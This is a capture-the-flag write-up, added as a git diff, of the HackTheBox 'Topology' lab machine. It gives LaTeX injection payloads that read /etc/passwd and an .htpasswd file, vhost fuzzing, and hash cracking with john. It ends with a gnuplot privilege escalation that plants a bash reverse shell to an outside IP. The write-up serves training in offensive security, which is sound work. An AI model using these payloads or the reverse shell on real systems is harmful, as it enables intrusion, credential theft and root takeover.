Create Topology.md

HackTheBox/Topology.md

@@ -0,0 +1,94 @@
+HackTheBox - Topology
+NMAP
+
+Nmap scan report for 10.10.11.217
+Host is up (0.20s latency).
+Not shown: 65533 closed tcp ports (reset)
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 dcbc3286e8e8457810bc2b5dbf0f55c6 (RSA)
+|   256 d9f339692c6c27f1a92d506ca79f1c33 (ECDSA)
+|_  256 4ca65075d0934f9c4a1b890a7a2708d7 (ED25519)
+80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
+| http-methods: 
+|_  Supported Methods: OPTIONS HEAD GET POST
+|_http-title: Miskatonic University | Topology Group
+|_http-server-header: Apache/2.4.41 (Ubuntu)
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+PORT (80)
+
+Visiting the webserver, we'll have a static page
+
+This page lists software projects, out of which Latex Equation Generator takes us to `latex.topology.htb
+
+Adding the domain name in /etc/hosts file
+
+Putting \input{/etc/passwd} will result to an illegal command
+
+Most of the commands were blacklisted, we can only read the first line of files with:
+
+\newread\file
+\openin\file=/etc/passwd
+\read\file to\line
+\text{\line}
+\closein\file
+
+We can make it read more lines but the limit was 3-4 lines
+
+\newread\file
+\openin\file=/etc/passwd
+\read\file to\line
+\text{\line}
+\read\file to\line
+\text{\line}
+\read\file to\line
+\text{\line}
+\read\file to\line
+\text{\line}
+\closein\file
+
+Exceeding 4 lines, we'll get an error
+
+Visiting the site the site with it's root directory / will reveal directory listing having tempfolder, in that folder we'll find texput.log
+
+So `\write18` is restricted, we cannot use it to execute commands neither read files, we can try fuzzing for vhosts using `wfuzz ` ```bash wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://topology.htb' -H "Host: FUZZ.topology.htb" --hh 6767 ```
+
+This finds two more vhosts, dev and stats, stats site doesn't really have much
+
+Dev site asks for credentials to access the site
+
+Since the latex on the site is using inline math mode , we can try using lsinputlisting for reading local files and we need to use it with $ at the beginning and ending of the latex command
+
+$\lstinputlisting{/etc/passwd}$
+
+With this we can access the whole /etc/passwd file and see that the sites are being hosted in /var/www
+
+We can read /var/www/dev/.htaccess file which shows that there's .htpasswd file
+
+vadaisley's hash can be cracked with john
+
+ john --wordlist=/usr/share/wordlists/rockyou.txt ./hash.txt
+
+And now we can login through ssh
+
+Checking sudo -l this user cannot run any commands as root or any user
+
+In /opt there's folder gnuplot where we have only write access
+
+From pspy we see gnuplot being ran as the root user and executing plt files
+
+We can create a plt file with a bash reverse shell and move it in /opt/gnuplot
+
+system "bash -i >& /dev/tcp/10.10.14.111/2222 0>&1"
+
+After few seconds we'll see our plt being executed as root and receive a connection on our listener with a root shell
+
+References
+
+    https://0day.work/hacking-with-latex/
+    https://texdoc.org/serve/latex2e.pdf/0
+    https://www1.cmc.edu/pages/faculty/aaksoy/latex/latexthree.html
+    https://en.wikibooks.org/wiki/LaTeX/Source_Code_Listings
+    http://www.gnuplot.info/docs_4.2/node327.html